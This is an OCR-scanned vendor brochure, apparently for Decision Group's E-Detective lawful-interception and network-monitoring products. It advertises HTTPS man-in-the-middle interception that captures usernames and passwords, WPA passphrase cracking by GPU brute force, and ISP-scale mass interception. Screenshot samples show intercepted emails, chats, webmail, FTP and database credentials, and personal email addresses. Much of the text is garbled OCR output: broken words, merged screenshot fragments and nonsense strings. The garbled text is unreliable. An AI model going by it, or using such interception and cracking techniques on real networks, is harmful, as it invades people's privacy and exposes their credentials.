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/E-Detective System 


m= Ethernet LAN Internet Monitoring System, Internet Auditing, 
Data Leakage Detection and Retention (DLDR), Record Keeping Solutions. 
= Also used by Law Enforcement Agencies for Lawful Interception 


| implemented at ISP networks and International Gateways. 


/E-Detective Data Guard System 
Q = Monitor Transactions of Heterogeneous Databases 
< (MySQL, MS SQL, Oracle DB, DB2, Sybase). 
= Monitor Windows CIFS activities — MS Ve 
File Sharing Activities. | 
`a Monitor Internal Mail Servers Sent/Received — POP3, SMTP / 


E-Detective Data Retention & Management System 
=" Archived backup data from E-Detective System. 
\= Review, search and query backup data. 
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TTPS/SSL MITM Interception System (LEA) 
= |ntercepting Ethernet LAN HTTPS Traffic such HTTPS Gmail Traffi 
including HTTPS username and password. ' 

= Also used by Law Enforcement Agencies for maeccm 
implemented at ISP network. Wise 


E-Detective Backup Server (ALL) 
= Archived backup data from E-Detective System. 
= Review, search and query backup data. 


E-Detective Central Management System (ALL) 
= Manage Multiple E-Detective Systems, ED Backup Server Systems, 
EDDC with Single Login GUI. 
= Centralized Search/Query. 
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= Wi-Fi IEEE 802.11 a/b/g/n passive interception system 
= Target can be an AP, a Client or entire Channel 

= Capable of decrypting WEP key 

= WD x 4 Extreme Systems comes with Distributed Capturing, 
Forbidding and Locator Functions. 


(LEA) 
= Recovery of WPA1-PSK and WPA2-PSK passphrase 
=" Using GPU Hardware Acceleration IS 
= Using Smart Dictionary (Mutation) 

= Using Masking (Target Brute Force Attack). 
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Integrated Interception & Real-Time Reconstruction Series 


etwork Investigation Toolkit — NIT (LEA) 
=" Ethernet LAN passive and active interception system 
= Wi-Fi IEEE 802.11 a/b/g/n passive and active interception syste 
= For Wi-Fi passive interception, targets can be up to 4 AP, 
4 Clients or 4 Channels. 
= Capable of decrypting WEP key. 
= WPA-PSK password recovery (optional) using WPA-PSK Passw 
Recovery System | 
= Decrypting HTTPS traffic including username and password 3 


Wwe by active implementation in both LAN and Wi-Fi Ges e 


a Capable of manually reconstructing the PCAP raw data files. 
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wäite eion Group Product & Solutions Overview 


Offline Manual Packet Reconstruction Series 


/ E-Detective Decoding Centre - EDDC (ALL)/ EDDC-LEMF (LEA) 
Q = Provides Case and User Management for different Investigators 
= and with different Cases. 

,. " Parse and reconstruct pre-captured PCAP raw data files manually. / 


Forensics Investigation Toolkit — FIT (ALL) = ` 


= The only Windows Based Software Application 

= Designed for single user usage. 

T ; My 
Parse and reconstruct PCAP raw data files manually. gj. 
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Wireline Ethernet Interception & 
Real-Time Reconstruction Series 
E-Detective System 


Introduction to E-Detective System 


Wireline Ethernet Internet Monitoring, Data and Record 
Retention & Network Content Forensics Analysis 
Solution (Real-Time Reconstruction) 


Solution for: 


Wi 


Ze 


Organization Internet Monitoring/Network Behavior Recording 
Auditing and Record Keeping for Banking and Finance Industry 


Forensics Analysis and Investigation, 
Legal and Lawful Interception (Ll) 
Compliance Solution for: 


Sarbanes Oxley Act (SOX), HIPAA, GLBA, SEC, NASD, E-Discovery etc. 
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E-Detective Standard System Models and Series (Appliance based) 
User can also opt to purchase software license only from us and use their own hardware/server. 


FX-06 Series FX-30 Series FX-100 Series FX-120 Series 
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Total Throughput Statistical Report 
(2009-02-20 13:48:22 ) 
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Store 


Save 
Archive 


E-Detective — Mirror Mode Implementation (1) 


E-DETECTIVE 
Mirror Mode Implementation 
Real-Time Reconstruction 


Organization or Corporate 
Network Deployment 


VAN Router/Firewall 


Mirroring needs to be done on the 


Managed Switch. —— 
SERVER FARM Uplink port 


Capture - Mirror Mode 


Sniffer technology is used for capturing Internet 


traffic/packets through port-mirroring switch. 


Manage 


& 


Administrator 
Another building/department/floor ^ Management port canbe connected tothe 
core switch and allow Admin to access the 


*Recommended implementation system from PC on the network 


USERS 


E-Detective — Bridge Mode Implementation (2) 


E-DETECTIVE 
Bridge Mode Implementation 
Real-Time Reconstruction 


Bridge mode (Inline mode) where all Internettraffic will 
passthrough E-Detective. It acts as a Gateway to all 
Internet. 


Router/Firewall 


eth | Uplink port 
SERVERFARM SWITCH 


Administrator 


Another building /department/floor 
* Implementation for small size network — less than 50 online users, which do not have a port-mirror switch 


E-Detective Lawful Interception (LI) Solutions 


: ; Law Enforcement 
Solutions for Lawful Interception Agencies (MICT) 
Nation Wide Deployment Sgr NASISAN 

EE a3 eu Storage 


Switch 


yeu pore, Access to Central Management System, Reporting, — IDS/ 
Intercepted and Reconstructed Content, Search." ~ Firewall 
Alert Functions etc. Ba , 
Data Traffic 10G e d 
Pom Switch °rmore ,SECURED ; 
/ PRIVATE h 
Aggregator / NETWORK ; 


Distributed Taps / 


ObjectFinder  'DS/Firewall 


N x E-Detective 
Systems 


|, NxE-Detective 
[ Systems 
`. IDS/ EM. 
Firewall à =; =: 
Switch ` 


Other ISP 


NAS/SAN 
Sites/States 


Storage 


Lawful Interception — Mass Interception (1) 


* Huge Amount of Traffic (10 G Throughput or More) 


* Aggregator and Distributed Tap/Data Access Switch can be used to 
filter the captured traffic (10 G or more) by Domain/Subnet/IP to 
multiple E-Detective systems for real-time reconstruction. 


** Max. reconstruction throughput handle by each E-Detective system is 
approximately 500 Mbps - 1 Gbps using hardware with RAID O 
configuration — 8 x HDD setup. 


** A Central Management Server (CMS) is used to manage the N x E- 
Detective systems scattered over the central location and site 
locations. 

** Data Captured (in Raw Data — PCAP format and Reconstructed Data) 
can be backup into E-Detective Backup Server System or NAS/SAN at 
the each location. 

«** CMS is made accessible securely by Lawful Enforcement Agencies to 

monitor, query, retrieve and obtain required captured information 

from various E-Detective systems deployed. 


Lawful Interception — Targeted IP Interception (2) 


** Smaller Amount of Traffic (capture and filter traffic by Targeted IP 
Addresses configuration) 


* Aggregator and Distributed Tap/Data Access Switch can be used to 
filter captured traffic (10 G or More) by targeted IP Addresses before 
providing the filtered raw data to E-Detective systems for real-time 
reconstruction. 


** Max. reconstruction throughput handle by each E-Detective system is 
approximately 500 Mbps - 1 Gbps using RAID O — 8 x HDD 
configuration. More than one E-Detective systems can be deployed to 
handle larger amount of traffic throughput. 

** A Central Management Server (CMS) is used to manage the N x E- 
Detective systems scattered over the central location and site 
locations. 

** Data Captured (in Raw Data — PCAP format and Reconstructed Data) 
can be backup into E-Detective Backup Server System or NAS/SAN at 
the each location. 

** E-Detective systems and CMS is made accessible by Lawful 

Enforcement Agencies locally or remotely (secure connection). 


E-Detective Sample Screenshots - Reports 


Total — Statistical — 


Refresh Mail Report ( 2009-03-30 13:46:22 ) Online User List 
Daily Traffic Weekly Traffic 
— EE 2009-03-30 2009-03-23 ~ 2009-03-30 — 
Quantity Throughput Report Quantity Throughput Report Quantity Throughput Report 
Summary 96.729 15,905 047 KB I ; 148.029_825_ 895 321 KB N 
® POP3 2009-03-30 LastDay È NextDay Mail Report KB Mi. 
f IMAP s POP3 Throughput Statistical Daily Report (KB) KB Hl, 
EMAIL $ SMTP 422,056 KB DX oom "m "og səs ml KB Wu 
,000 

[ca Webmail(Read) 212,780 KB KB N 
[3 Webmail (Sent) 821 430,035 KB KB N 
A MSN 11À 252,787 KB KB lil. 
ICQ 2.184 KB KB lih. 
35 YAHOO WE" 207910 KE I. KB IW, 
Aaa de V QJ eg EI e e "0 81 KB M. 

CHAT f Home PAGE | Š? POP3 | W Delete | Š Search | ÉAccounlist — = = Every Page [_20][ Confirm 
* SKYPE No. [J 6 DateTime Account Sender Receiver cc Subject Size SES 1 KB ll, 
UT UT Chatroom im po fyy  Mailer-Daemon@v. liba à 9 May Infected] Mail de.. 1086 TL & log KB l, 

= 20H 0 rea vic decision@seed.n vic@decision.co. = © t Fwd:Fw: 02School polic. 1.03M TL a, 
& GOOGLETALK 3 HE 8 pg flyy vic@decision.co s. = Ë] [3 Fw: 04other informatio 93135K MM. a 31 KB l, 
IRE IRC Chatroom 4 E e MË ` mn  edetectve@163.... qe decision c kingO613@y... © H ra Fw:06block omi. 20525K D à, |46 KB N 

= Sa a SEH fyy _edetectve@ie3... Ë king0613@y.. fÉ H 8 Fw:05Those arrested-35... 96.78K [Cl 

FTP 14:06:31 ° flyy@decision.c g y > 7 a 92 KB Mil. 

FILE TRANSFER E e E) ü DT fyw ` casperkanQmsa... iy Qdocision.c Kig063Qy.. £ Hp Fw: Otnorthem lights... 7824K [Cl A 
= P2P rme C "yy ` casperkanQmsa... fyy@decision.c kingOs13@y.. & E Fw O5Those amested.Z..20276K MT @ IES KB N 

= 8 [rj @ ECH flyy vincentyao@deci vic@decision.co. decision@d SESCH 8710K M a, 
ONLINE GAME a Online Game a P Se fy — peterQdecisin.. — B yGdecisionc TEE 31K EI A 0 KB Ih, 
EI HTTP Link 38) r 20090330 ` peter  rickwang@decisi.. decision 2 Oa [Bug 1255] gege. 315k TL al 0 KB N 


Homepage - Top-Down Drill to Details Reporting 


E-Detective Internet Protocols Supported 


De Gmail: Email from Google - Windows Internet Explorer I 


(O E https: google.com/accounts/Servicel. 


File Edit View Favor k Help 


¢ Favorites * Gmail: Email from Google m - * [7] dh v Pager Safetyv Toos @+ ” 


5 th + Pagev Safeyv Toosv Qv ” 


G [Ma] Welcome to Gmail 


A Google approach to email. 


— a 
Web Search Sign in to Gmail with your 


Google Account 
Singaporel) 75 25°c ~ 31°c 


Check your mail statis 


File Transfer 


Google Talk 
Etc) Others FTP, P2P 


Online Games 
Telnet etc. 


Sample: Email (POP3, SMTP and IMAP) 


No. [] O Date-Time Account Sender Receiver CC Subject Size simil? Whols 
E ii) pev frankie frankie@digi-fo... -EPEN a F] m FW: U.S. needs Iran&#0... 8231K [C] A 
20 8 E frankie ` decision(Qed-sys... frankiedi.. = F) m FW: Govt rejects ultim... 17285K [Cl — 
3. m 6 Sie frankie frankie@ed-syst.. Edge, frankie)di.. — £3 © HSG Football: Australi... 12643K [Cl à 


=» 2009-02-01 Medic OUR A - 
© FW: Football: Australia makes bid for 2018 World Cup - Thunderbird ET Cen Hostname query 
File Edit View Go Message Tools Help | Sre IP :122.116.65211 Whois query 
ine Ee k 3 A Google Map 
H. N | Ww ei v = | : 
Get Mail Write Address Book Reply Reply All. Forward ag Delete Junk i F 


-= — = = — d 3 Hostname query 
— Subject: FW: Football: Australia makes bid for 2018 World Cup h 
n E frankie@di... | Dst IP :192.168.1.33 | Whois query | | Dst Host: 


Date: 2/1/2009 2:38 PM Google Map 
To: frankieG ed-system.s: - frankie@di — 


Cc: frankie@digi-forensics.com 


Football: Australia makes bid for 2018 World d Pues wedetectiv... 
| Ee IP: HOST : 122-116-65-211. 
Cup E 12211665211 — — IP hinet net 


MELBOURNE: Australia have formally lodged their bid to host the 2018 or 2022 Fifa W| XA / 10.1S (C — — Whois query Whois query 


Federation Australia (FFA) Chairman Frank Lowy said Sunday 


Query Result 


TE Mis ecinon-comta/pranip. ep ghpinapifo Ora SOD: QURAPzglOtsPFATPORAORAOEAR ZSISIFODwO - Windows Interet Explorer 


Initial expressions of interest to Fifa, the world governing body for the sport, are requird vmos t ommation — Sugges Premi ans eb Sea DN is This location by IP : 


nations by Monday. QT tal 066 850.6479) 
MasCD com $438800 MasMrcom $3188.00 MavAccossories com $1788.00 MaxAectcom $2188.00 Maxine com $3288.00 Maxiporsisers com 
"We have submitted Australia's expression of interest in hosting either the 2018 or 202] TUD Availability” Taren Domains _ Available Domains 


Cup,” Lowy said in a statement mam 


linenet ma am fo manent “(ma 


Buy Now $8.99 at name.com | Purchase 


ore Site Www Single Sg usiness PushMail 
š gapore Singles Near You Local Singles looking for honest veless solution for 
Language.doc pcd_hwz_cpg2_hp_b2000,jpg Browse Photo Profiles. Join Free! Relationships, Test be2 Now! te email and data 


Registry Whois 


name.com + Google 


SGNIC WHOIS Server 
Every domain name now comes 
The following data is provided for informabon purposes only with select Google Apps FREE! 


Registrar IP MIRROR PTE LTD cocer rcd 
Registrant. STARHUB LTD. 


Google 
Domain Name: MAXONLINE.COM SG 
Creation Date. 10-Dec-2002 18 30 11 


Sample: Web Mail (Read and Sent) 


No. "Date Time Account Sender Password Receiver CE BCC Subject Webmail Similar 


-a 
T. UNITED NATIONS - RICH and poor nations have more in common this year: a growing sense of | | 
economic insecurity. 


YAHOO Mail 


8. [7] Thes sheared PRE PEET lnrgely dine to "trade docks! &oim cidag od aud food prices; rattled nancial GMail 


markets, natural disasters and armed conflicts. the UN said in its annual survey of world economic 
and social trends. released on Tuesday. ° AA, ` AMMAN V AAA... 


a EE | o [ea SINGAPORE ARUINES a 


"The food riots that broke out in a number of countries in early 2008 have laid bare the fragility of 
economic livelihoods for those at the bottom of the development ladder.' the report says. 


Type Search 
* pe^ p EECH UU  decisionged-... +> [3 Bush GMail =a 
ZP ras 192.168.1.11 r ee UU support@ed-s... +> EJ Wl finds world econo... GMail bal 
3. Fl TT 192.168.1.11 wisakuna: *" support @ed-s _ 15 H Africa Windows Live [C] 
4. odere : 4} EJ UN agency hails gree...Windows Live [1 
FROM : frankie decisiongigmail com 

"1 meetin: gees l i o Qoo m 
E "| NEN —A elective Ae nam um un asam uama .. YAHOO Mail [C], 
i ei 

m 

m 


Mr Sha Zukang. the U.N. undersecretary-general for economic and social affairs. suggests nothing 
less than 'a global New Deal' or Marshall Plan-like approach to help the world's poor, especially the 
1 billion people who live on less than USS1 (S$1.36) a day. 


Under that plan, nations would set aside cash grants that nations could pay to each household. 
something along the lines of the dividends paid to Alaskans each year since 1980 from oil and gas 
money. 


‘Such measures are. of course. fraught with complications and difficulties.' he savs in the report. 


Webmail Type: Yahoo Mail, Gmail, Windows Live Hotmail, Giga Mail and others 


Sample: IM - Yahoo, MSN, ICQ, IRC etc. 


Ža MSN | W Delete | Search | ¿Account List Every Page| 8l 


No. 6 ^ Date Time Account User Handle Participants Conversation Count sisa 
9. poer VIC-TEST diesis@ms62_hinet.net dick691111@yahoo.com.tw +Conversation 20 a 
10. [7] — VIC-TEST diesis@ms62.hinet.net she0430@hotmail.com +Conversation 11 a 
11. H — VIC-TEST diesis@ms62 hinet.net 3$ shmily.d0613@msa.hinet.net +Conversation 48 Ist 
14. [] 0 euim FLYY 3$ shmily.d0613@msa_hinet.net diesis@ms62_hinet net iConversation ` 48 ial 
13. — FLYY 38 shmily.d0613@msa hinet net philip12129@hotmail.com ‘Conversation 8 ` [C 
14. E Se FLYY 38 shmily.d0613@msa hinet net dick691111@yahoo.com.tw ‘Conversation 28 Q 
15. (J — 192 168 .1.13 “> wedetective@hotmail.com 4% wedetective2@hotmail.com +Conyersation 7 bel 
Met ee 3 wedetective2@hotmailcom ` Freres one AS 
Wa 123 »n Enter Page We [ Go ] š oO — — erum 


wedetective2 Message howru? 


28 Friend List:shmily.d0613@msa.hinet.net Every Page :| d Confrm ] 


wedetective1 Message hi 


wedetective1 Message | am fine 


z 
o 


Account Nickname 
tw8(g5floor.com TUBPERE A. 


mimo360@gmail.com mimo 


wedetective1 Message thank you 


e 
2008-07-02 á A 
10:40:42 wedetective1 File 
TA 


2008-07-02 
- 10:40:55 wedetective1 File Customer Request Form.pdf 


2008-07-02 


sheaman@ubbn.net 
decision-vincent@msn.com 
tigecici@msn.com 
wedetective1 Message thank youll!!! 
yunlin0217(g msn.com 
boni756m(gpchome.com tw cryin-TEEEREBETEAR RR. 
poeuta@hotmail.com 


412345678 wmEnterPage[ ] Total 61 Total Page 8 Current Page 1 


wedetective2 Message welcome 
2008-07-02 2008-07-02 


1 
2 
3 
4 
5 
6 
7 
8 


wedetective1 Audio e 


wedetective1 Audio 
2008-10-12 


: 2008-07-02 
20:55:48 wedetective1 Audio 10:41:02 


Md wedetective1 Video SE an anan 
Total 15 Total [pene 1 Current Gs 


Sample: File Transfer — FTP Upload/Download 


Ho || Date-Time Account Username Password Action FTP Server IP File Name vun Whols 
33. pj Se anonymous IEUserQ Download ^ 647 210.151 DWA-642. ds. pdf à 
34. E SD Gemen anonymous lEUser@ Download 64.7.210.151 -3200-10 ds.pdf Imt d 
35. repel, m anonymous IEUser@ Download DWA-140 ds.pdf Is! a 
36. P 2( File Download a, 
2 Do you want io open or BN Pie? File Edit View Document Tools Window Help 
37. I = Pat € $ 1 /3 @ @ 53%- | ZJ E a 
2( um. Name: DSN-3200-10 ds.pdf 
38. eg Type: Adobe Acrobat Document, 350KB a 
2 From: 192.168.10.60 T 
39. a, 
40 2 | em 2 
š VOIP-DETECTIVE 
“4 123 -. i age 5 
[?] L eae ee Capable to capture, decode and reconstruct 
wv save this file. What s the risk? ` VOIP RTP sessions. 
* Supports SIP and H.323. 


* Supported CODECS: G.711-a law, G.711-u law, 
G.729, G.723, G.726 and ILBC. 


Capable to play back VOIP sessions. 


Sample: File Transfer — P2P File Sharing 


gË P2P | wr Delete | QSearch Every Page :[ 20]| Confirm | 


Date-Time Account Tool File Name Last Activated a Gee E më? Detail néier 
20081013 frankie BitTorrent BOSON Netsim for CCNP 7 N... — 1084K 1.48M Detail TI 
H "eee. frankie LimeWire/4.16.6 ^ Bon Jovi - You Give Love ... gie 0B 34637K lä 1 
aad o. — 192.168.1.11 BitTorrent Not Available "e 11M — 1175M Ddai l 
I K« 1 »» we dv |Æ P2P |192168.10.10 | 


dl Date-Time: 2008-10-13 08:07:43 | IP: 192.168.10.10 | File Name: [BOSON Netsim for CCNP 7 NEWEST 100% WORKING ( cisc ` 


= 
° 


Date-Time Action P-IP Port 
2008-10-13 08:07:43 Download 75.64.216.60 60544 
2008-10-13 08:09:20 Upload 74.213.65.175 60545 
2008-10-13 08:10:35 Upload 72.77.16.150 60814 
2008-10-13 08:13:31 Upload 92.125.81.31 60805 
2008-10-13 08:14:35 Upload 90.154.220.26 60747 
2008-10-13 08:14:54 Upload 75.49.110.71 60842 
2008-10-13 08:16:26 Download 83.110.223.51 60764 
2008-10-13 08:17:11 Download 67.10.145.51 60550 
2008-10-13 08:17:20 Upload 72.139.109.160 60798 
2008-10-13 08:20:21 Download 74.213.65.175 60818 
2008-10-13 08:23:34 Upload 90.154.220.26 61048 
2008-10-13 08:23:35 Upload 96.232.199.101 61537 
2008-10-13 08:23:53 Upload 83.110.223.51 61316 

Total 13 Total Page 1 Current Page 1 


LE bw Ra EI, E 


Supports P2P such as Bittorent, eMule/eDonkey, Fasttrack, Gnutella 


Sample: File Transfer — Windows CIFS 


*JciFS | MDelete | Q. Search Every Page:| 20|| Confirm | 
No. ©  Date-Time* Account Username Action? Server? Path File Name sizes Similar Whols ^ 
1. m erry Chihtung Chihtung Download 192.168.1.111 PUB\staffineoyuxxx\ lanbypass.tgz 13.05K M a 
2 Teen  Chihtung ^ Chitung ^ Download ^ 192.168.1111 — PUBIstaffineoyuxxx\ lanbybliSs.tgz 1305K A A 
3. m — Chihtung Chihtung Download 192.168.1.111 PUB\stafflneoyuxxx\ lanbypBss.tgz 13.05K M a 
4. B pied Chihtung ^ Chihtung Download ^ 192.168.1.111 PUBìstaffineoyuxxx\ lanbyphss.tgz 1305K A Q | 
5. m 7012079.  Chihtung ^ Chihtung ^ Download 192.168.1.111_ PUBIstaffneoyuxxx\ lanbyphss.tgz 13.05K TQ 
6. 20129197 Chiung Chihung Do fig ees 1305K A 
7 m eer Chihtung Chihtung Dell Eile. Commands Tools Favorites Options Help 13.05K mi a, d 
8. Teen  Chihtung ^ Chihtung Do 9t LR e ia B op Dä a) B 3o [d A 
e m ibaa Chihtung Chihtung Do} (E Se 13.05K [1 a, 

10. " asi — Cung chus Oo: i UCM e 1305k Fa À 
11. nm TA  Chitung ^ Chihtumg Do ou MN en nek [d A 
12. 2012.0107  Chitung ^ Chihtung Doj 1305Kk A A, 


ak 123456 nm Enter Page! || Ge |] 


9 Total Page 6 Current Page 1 


Total 1 folder 


Supports Windows File Sharing Logs and Reconstruction — Tapping point must contains these data transfer. 


Sample: HTTP (Link, Content and Reconstruction) 


No.Date-Time Account Referer Content 


2003-01-01 e 

1. 01-13-59 wedetective2 1 Elwww.google.com.sg/ 
2003-01-01 š : EE 
2: 01-13-45 wedetective2 0 ` [*static.ak facebook. com/common/redirectiframe html 
3. EE wedetective2 0 Fstatic.akfacebook.com/common/redirectiframe. html 
4. E id wedetective2 0  [*static.ak facebook.com/common/redirectiframe.html 
5. 20030101 wedetective2 0 [Flwww.facebook.com/ajax/profile/tab.php?id=221100481476&v=photos&href=&iframe=true&nctr%5B_ia%5D=1&_log_src_tab_n ... š 
6. Se e wedetective2 0  [Plwww.facebook.com/ajax/profile/tab.php?id=221100481476&v=info&href=&iframe=true&nctr%5B_ia%5D=1&_log_src_tab_nam ... 
T. por wedetective2 38 ` ("www facebook. com/pages/E-Detecyve/221100481476?ref-ts 
8. 2003.0101 wedetective2 0 = ©10.channel06.facebook.com:80/ifrange/10?r=http%3A%2F %2F static. ak.fbcdn.net962Frsrc.php?62Fz4KTI962Fhash962F tvifqmrg. ... 
E Detective - Windows Internet Explorer. Kach 
9 yt [IE] http://192.168.1.60/datas/20030101001926/201435326 3194268401 /3828126935, html HE WP Crowier Sean 3542060594 
10. ge L22 hfis BA%2F%2Fstatic.ak.fbcdn.net%2Frsrc.php%2Fz4KTI%2Fhash%2F1vifqmrg.j ... 
facebook Home profile Friends Inbox 

11 200 

D a phot Di a | i 
12. "d asa š —T=== | BA%2F %2F static.ak.focdn.net%2Frsrc._php%2FzZ4KTI%2Fhash%2F 1vifqmrg.]j ... 
ë 200 po |== = = ES —— x 

š ABA mom f 1 S 
= 200 Sugg Friends G E-Detective E-Detective Best Design Awards enne = 
a ESS Sd Total 32 Total Page 2 Current Page 1 


brand created by Decision Group 


lunch daily and spending 
money! 


ei Like 


Information 


Founded: Brighten your Smile x 


Decision Group January 11 at 10:09pm ` Comment ‘Like ` Share 
ED E-Detective E-Detective SBIR R&D Awards 

Fans = 

6 of 7 fans vu O; NI 


Say goodbye to yellow or 
stained teeth. Whiten teeth 
safely. One hour is all it 


DOMA ME ree P te chet (fe 
@ Internet | Protected Mode: Off 


HTTP Web Page reconstruction 
through proxy service 


fay Rw% v 


Sample: HTTP Web Upload/Download 


— A A A AD - 
YII. T Seet — NN 


Á HTTP Upload/Download | W Delete | & Search | Rule Set Every Page :| 201 Confirm | 


File Similar = 


No. [J Date-Time Account Action File Name URL h 
Size Search 
1. pret frankie Download [E] CCNA torrent http-//isohunt.com/download/31... 11.06K =a 
2. P SE frankie Download [*1 Hu_081011Int_Soccern... http://dmcom.espn.go.com/motio... 720M [Ol 
3. pues frankie Download M] Hu 081011Int Soccern... http-//static espn.go.com/moti... 261K O 
4. E pecia tg frankie Download [3 sg ing 730x355 flvh.. http://richmedia-yimg.com/cust... 739.33K C 
5. PJ porke frankie Download H sg ing 730x90 flvhi...  http://richmedia-yimg-com/cust... 171.22K [ |= 
6 P grein 192.168.1.11 Upload 31 SIA jpg http://mail.google.com/mail/?u... 2321K [A 
2008-07-02 š DS l 
. : 3 p ail/? ` 
E Hed ct TVS — “s w UN 
, j 20080702 — 402.168.1.1 .. I3 SIA jpg E —— : og A 
File Download - x 
o O 
Do you want to open or save this file? 
208 A H 
Name: SIAjpg y 
Type: JPEG Image, 23.2KB i J 1 : 67.07K fal 
Te 192.168.10.60 MAAN SE NS 
| ` owe _ S\GAPORE AIRLINES = ai 16B TC) 
B ` me f y = Š 57B bel 
| @, While files from the Intemet can be useful, some files can potentially 0B [a - 
q J harm your computer. If you do not trust the source, do not open or à Zs 
77" save this file. What's the risk? al Page 4 Current Page 1 


Sample: HTTP Video Streaming (FLV Format) 


- e e | Q ole 
- J =) á * b 
GeGeogoceecoceccca à 
ideo Stream elete earc very Page : onfirm 
M Video Steam | TE Delete | Q. Search — 
No. | Date-Time Account HOST File Name URL io I 
Size Search 
2008-10-13 ` : TOR DES 
2. P 07-39-42 frankie static.esp... +Hu_081011Int_Soccern http-//static espn.go.com/moti 2.61K 
3. P —— frankie richmedia... ^ Leg ing 730x355 flv.h http-//richmedia.yimg.com/cust 739.33K [1 
4. P posee frankie richmedia.... Leg ing 730x90 flv.hi http-//richmedia.yimg.com/cust 171.22K [A 
5. | prophets frankie v.mccont.c... +[From www.metacafe.c... http-//v mccont.com/ItemFiles/ 188M TL 
6. E puppi frankie v.mccont.c.. [From www.metacarm me... http://v.mccont.com/ItemFiles/ 3 .863.43K CL 
Um Playback of Video File 
T. E 20:49:00 frankie v.mccont.c... +[From www.metacafe.c ttp-//v.mccont.com/ItemFiles/ 137M [Ol 
8. [7] pops frankie  v.mccont.c.. [From www.metacafe d BJ https¥/192.168.10.60/general/common/http/player.... =t% | 534 78K [Tl | 
Se 192.168.10.60 = 
9. m a frankie — v.mccont.c.. +[From www.metacafe.q 508.67K [Ol 
10. [7] pusaq frankie ` v.mccont.c.. [From www.metacafe d 180M [Cl] 
11. [Fl — frankie dmcom-espn...4Hu_081009Int_PressPag 20.83M TL 
12. E plats frankie static.esp... +Hu_081009Int_PressPa 159K Il 
, 2008-10-12 : ! 
13. P 20-45-37 frankie clips.thes... Up ep06 flv 114M O 
1. (3 7009 07. frankie — staticesp.. Hu 081009t_PressP: 159K E) 
15. E portet frankie ^ staticesp.. «Hu 081011Int Soccer 261K [Q — 
wa l nm 12) 22:25 2d Current Page 1 


Video Stream (FLV format): Youtube, Google Video, Metacafe. 


Sample: HTTP Request (GET & POST) 


No. [J Date-Time Account Action URL "eme 
1. Œ 2009-09-21 12:04:18 frankie GET +http://sg.yahoo.com/s/269308 rat a, 
2. Œ 2009-09-21 12:04:18 frankie GET http://sg.yahod|com/p gif?t=1253505895&_ylp=A3xseLln 7zKas0... A a, 
3. [Œ 2009-09-21 12:04:01 frankie GET http:/'sg.yahod[com/s/269375 a a, 
4. |] 2009-09-21 12:03:48 frankie GET ihttp://sgyahod[com/?p=us a a, 
Wain Total 4 Total Page 1 Current Page 1 


@ https//192.168.1.13/general/common/http/http original.php? file-LzxQbmt9625252Ba30vPFABOjpDOKMS - Window... Le (El |j 


GET /s/269375 HTTP/1.1 
Accept: */* 
Referer: http://sg.yahoo.Con/?p-us 
Accept-Language: en-sg 
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Foxy/1; SLCCl; MET CLR 2.0 
Accept-Encoding: gzip, deflate 
Host: sg.yahoo.Com 


Connection: Keep-Alive 
Cookie: Y=v=lém=as 1b] 3nhshaa8&l=9k1l4djk1_8) 0/ o&p=m2 1 vvrmy1 130005008) b=24 | 701412=75450r=7hél g=en-USéint l: 


S &@G@@S OGC CCC OQ 


Bäteine | ff Delete | A Search 


Account User Passwort 
lafa188 lafa1965 

new yes 
lafa188 lafa1965 


Visibility Group : 


ALL 


Every Page: E 


Server Record File 


140.112.172.11 121.37K 
140.112.172.11 189.25K 
140.112.172.11 121.37K 
4.67K 
4.62K 


co + O Q P o NA 
| 


=> — — — A = oe 
a + OO N |= o 
[ [ 


16 
«123456789 »» Eni 


(ASN GE) 


189.25K 
121.37K 
4.67K 
4.62K 
189.25K 
121.37K 
4.67K 
4.62K 
121.37K 
189.25K 
4.67K 
Total 189 Total Page 10 


ma a 
a Q 

l A 

1 @ 
l A 
a @ |, 
3 à 

1 a 

l @ 

1 @ 

1 R 

1 Q 

- 

n à 

1 @ 
TENA. 


Current Page 1 


Sample: VoIP Calls (with Play Back) - Optional 


© VOIP | tfr Delete | & Search | Upload Every Page | 20 
NO. F] Date-Time Account Caller Callee Mode Type Codec File Name Time 

1. FP piede 192.168.6.8 48610044407 8610000104 peer to peer SIP G723 VOIP_VXdHcR.wav 10 Sec 
2-. EI SEN 192 168 1.132 8610044420 E8610044421 peer to peer SIP iLBC VOIP_i9d6zK.wav 58 Sec 
3. P Te 192.168.1.132 58610044420 88610044421 peer to peer SIP G729 VOIP. HKr7PR.wav 50 Sec 
+: SC 192.168.1.132 286100 iiis emm VOIP DN1QFr.wav 1 Min 3 Sec 
5. P pré 192.168.1.132. 886100 VOIP JKofpkwav 1Min 2 Sec 
Wain otal5 Total Page 1 Current Page 1 


Play back of reconstructed VoIP audio file using Media Player 
Support SIP/H.323 RTP Codec such as G.711a-law, G,711p-law, G.726, G.729, iLBC 
Important Features for Internet Online Fraud (Cross Border) — Case Studies! 


Sample: Database Logging 


EM ALL M 


Visibility Jp : 
/'& SQL | Tr Delete | fiSPass Hide | & Search Every Page:| 20|| Confirm | 


tv Groun 


No. ©  Date-Time* Account Username Password Server* DB Name Command DB Type "enel Whols ^ 
1 m 7020 o. 1924684470 sa 313131313131 192.168.1.131 de — Insert into pop3 ( FROM, TO, CC, BCC, SU.. MssQL Q A 

2. r 7012970. 1924684470 sa 313131313131 192.168.1131 de Select count(*) From pop3 msa M d 

s Tas 1924684470 sa 313131313131 192.168.1131 de use de mssal TM à 

4 m 20129107 1924684470 sa  313131313131 192.168.1.131 set textsize 64512 msa Q A" 

5. m ET 1924684470 sa 313131313131 192.168.1.131 — de — Insertinto pop3 ( FROM, TO, CC, BCC, SU.. MssQL Q A 

e. m 79120107 1924684470 sa 313131313131 192.168.1131 de Select count(*) From pop3 msa M A 

7 20120107 1924684470 sa 313131313131 192.168.1.131 de use de msa Q Q j| 
a m eos 1924684470 sa 313131313131 192.168.1.131 set textsize 64512 msa [1 4 

9. c  ?70 0. 1924684470 sa 313131313131 192.168.1131 de — Insertinto pop3 ( FROM, TO, CC, BCC, SU.. MSsSQL [d A 

40. SE 192.168.1.170 sa 313131313131 192.168.1.131 de Select count(*) From pop3 msa M d 

um r ET 1924684470 sa 313131313131 192.168.1.131 de use de mssa Q à 

12. m 79120107 4924684470 sa 313131313131 192.168.1.131 set textsize 64512 msa A à. 
«123456789 »»EnterPage| | Total 872 Total Page 44 Current Page 1 


Supports Database Logging - MySQL, MsSQL, Oracle etc Database Commands. 
Interception points must contain the Database commands packets. 


Sample: Unknown Traffic Analysis 


Protocol ^ 


[gl Date-Time Src IP Dst IP SrcPort DstPort Src MAC Dst MAC Packets 
